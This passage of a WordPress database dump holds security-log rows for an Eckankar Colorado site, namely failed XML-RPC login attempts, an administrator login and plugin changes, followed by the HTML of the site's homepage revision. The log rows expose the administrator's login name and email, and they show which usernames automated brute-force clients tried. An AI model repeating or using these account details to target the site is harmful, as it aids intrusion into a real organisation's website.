Linux/3.10.0-1160.11.1.el7.x86_64'),(213633,35148,'_message_key','user_unknown_login_failed'),(213634,35148,'_xmlrpc_request','true'),(213635,35148,'_server_remote_addr','150.158.150.x'),(213636,35148,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213637,35149,'failed_username','admin'),(213638,35149,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213639,35149,'_message_key','user_unknown_login_failed'),(213640,35149,'_xmlrpc_request','true'),(213641,35149,'_server_remote_addr','150.158.150.x'),(213642,35149,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213643,35150,'failed_username','admin'),(213644,35150,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213645,35150,'_message_key','user_unknown_login_failed'),(213646,35150,'_xmlrpc_request','true'),(213647,35150,'_server_remote_addr','150.158.150.x'),(213648,35150,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213649,35151,'failed_username','eckankar-colorado'),(213650,35151,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213651,35151,'_message_key','user_unknown_login_failed'),(213652,35151,'_xmlrpc_request','true'),(213653,35151,'_server_remote_addr','150.158.150.x'),(213654,35151,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213655,35152,'failed_username','eckankar-colorado'),(213656,35152,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213657,35152,'_message_key','user_unknown_login_failed'),(213658,35152,'_xmlrpc_request','true'),(213659,35152,'_server_remote_addr','150.158.150.x'),(213660,35152,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213661,35153,'failed_username','eckankar-colorado'),(213662,35153,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213663,35153,'_message_key','user_unknown_login_failed'),(213664,35153,'_xmlrpc_request','true'),(213665,35153,'_server_remote_addr','150.158.150.x'),(213666,35153,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213667,35154,'failed_username','admin'),(213668,35154,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(213669,35154,'_message_key','user_unknown_login_failed'),(213670,35154,'_xmlrpc_request','true'),(213671,35154,'_server_remote_addr','150.158.150.x'),(213672,35154,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(213673,35155,'failed_username','jonbarratt'),(213674,35155,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(213406,35103,'failed_username','admin'),(213407,35103,'server_http_user_agent','Mozilla/5.0'),(213408,35103,'_message_key','user_unknown_login_failed'),(213409,35103,'_server_remote_addr','20.216.24.x'),(213410,35104,'failed_username','admin'),(213411,35104,'server_http_user_agent','Mozilla/5.0'),(213412,35104,'_message_key','user_unknown_login_failed'),(213413,35104,'_server_remote_addr','20.216.24.x'),(213414,35105,'failed_username','admin'),(213415,35105,'server_http_user_agent','Mozilla/5.0'),(213416,35105,'_message_key','user_unknown_login_failed'),(213417,35105,'_server_remote_addr','20.216.24.x'),(213418,35106,'failed_username','admin'),(213419,35106,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(213420,35106,'_message_key','user_unknown_login_failed'),(213421,35106,'_server_remote_addr','139.196.46.x'),(213422,35107,'failed_username','admin'),(213423,35107,'server_http_user_agent','Mozilla/5.0'),(213424,35107,'_message_key','user_unknown_login_failed'),(213425,35107,'_server_remote_addr','20.216.24.x'),(213426,35108,'failed_username','admin'),(213427,35108,'server_http_user_agent','Mozilla/5.0'),(213428,35108,'_message_key','user_unknown_login_failed'),(213429,35108,'_server_remote_addr','20.216.24.x'),(213430,35109,'failed_username','admin'),(213431,35109,'server_http_user_agent','Mozilla/5.0'),(213432,35109,'_message_key','user_unknown_login_failed'),(213433,35109,'_server_remote_addr','20.216.24.x'),(213434,35110,'failed_username','admin'),(213435,35110,'server_http_user_agent','Mozilla/5.0'),(213436,35110,'_message_key','user_unknown_login_failed'),(213437,35110,'_server_remote_addr','20.216.24.x'),(213438,35111,'failed_username','admin'),(213439,35111,'server_http_user_agent','Mozilla/5.0'),(213440,35111,'_message_key','user_unknown_login_failed'),(213441,35111,'_server_remote_addr','20.216.24.x'),(213442,35112,'failed_username','admin'),(213443,35112,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(213444,35112,'_message_key','user_unknown_login_failed'),(213445,35112,'_server_remote_addr','133.130.103.x'),(213446,35113,'failed_username','admin'),(213447,35113,'server_http_user_agent','Mozilla/5.0'),(213448,35113,'_message_key','user_unknown_login_failed'),(213449,35113,'_server_remote_addr','20.216.24.x'),(213450,35114,'user_id','2'),(213451,35114,'user_email','nada@zipnadanot.org'),(213452,35114,'user_login','S8zhaBda'),(213453,35114,'_user_id','2'),(213454,35114,'_user_login','S8zhaBda'),(213455,35114,'_user_email','nada@zipnadanot.org'),(213456,35114,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(213457,35114,'_message_key','user_logged_in'),(213458,35114,'_server_remote_addr','76.130.120.x'),(213459,35114,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(213460,35115,'failed_username','admin'),(213461,35115,'server_http_user_agent','Mozilla/5.0'),(213462,35115,'_message_key','user_unknown_login_failed'),(213463,35115,'_server_remote_addr','20.216.24.x'),(213464,35116,'plugin_name','Redis Object Cache'),(213465,35116,'plugin_slug','redis-cache'),(213466,35116,'plugin_title','<a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>'),(213467,35116,'plugin_description','A persistent object cache backend powered by Redis. Supports Predis, PhpRedis, Relay, replication, sentinels, clustering and WP-CLI. <cite>By <a href=\"https://objectcache.pro\">Till Krüss</a>.</cite>'),(213468,35116,'plugin_author','<a href=\"https://objectcache.pro\">Till Krüss</a>'),(213469,35116,'plugin_version','2.4.4'),(213470,35116,'plugin_url','https://wordpress.org/plugins/redis-cache/'),(213471,35116,'plugin_github_url','https://github.com/rhubarbgroup/redis-cache'),(213472,35116,'_message_key','plugin_deactivated'),(213473,35116,'_user_id','2'),(213474,35116,'_user_login','S8zhaBda'),(213475,35116,'_user_email','nada@zipnadanot.org'),(213476,35116,'_server_remote_addr','76.130.120.x'),(213477,35116,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(213478,35117,'plugin_name','Redis Object Cache'),(213479,35117,'plugin_slug','redis-cache'),(213480,35117,'plugin_title','<a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>'),(213481,35117,'plugin_description','A persistent object cache backend powered by Redis. Supports Predis, PhpRedis, Relay, replication, sentinels, clustering and WP-CLI. <cite>By <a href=\"https://objectcache.pro\">Till Krüss</a>.</cite>'),(213482,35117,'plugin_author','<a href=\"https://objectcache.pro\">Till Krüss</a>'),(213483,35117,'plugin_version','2.4.4'),(213484,35117,'plugin_url','https://wordpress.org/plugins/redis-cache/'),(213485,35117,'plugin_github_url','https://github.com/rhubarbgroup/redis-cache'),(213486,35117,'_message_key','plugin_activated'),(236776,40257,'post_prev_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;  z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow 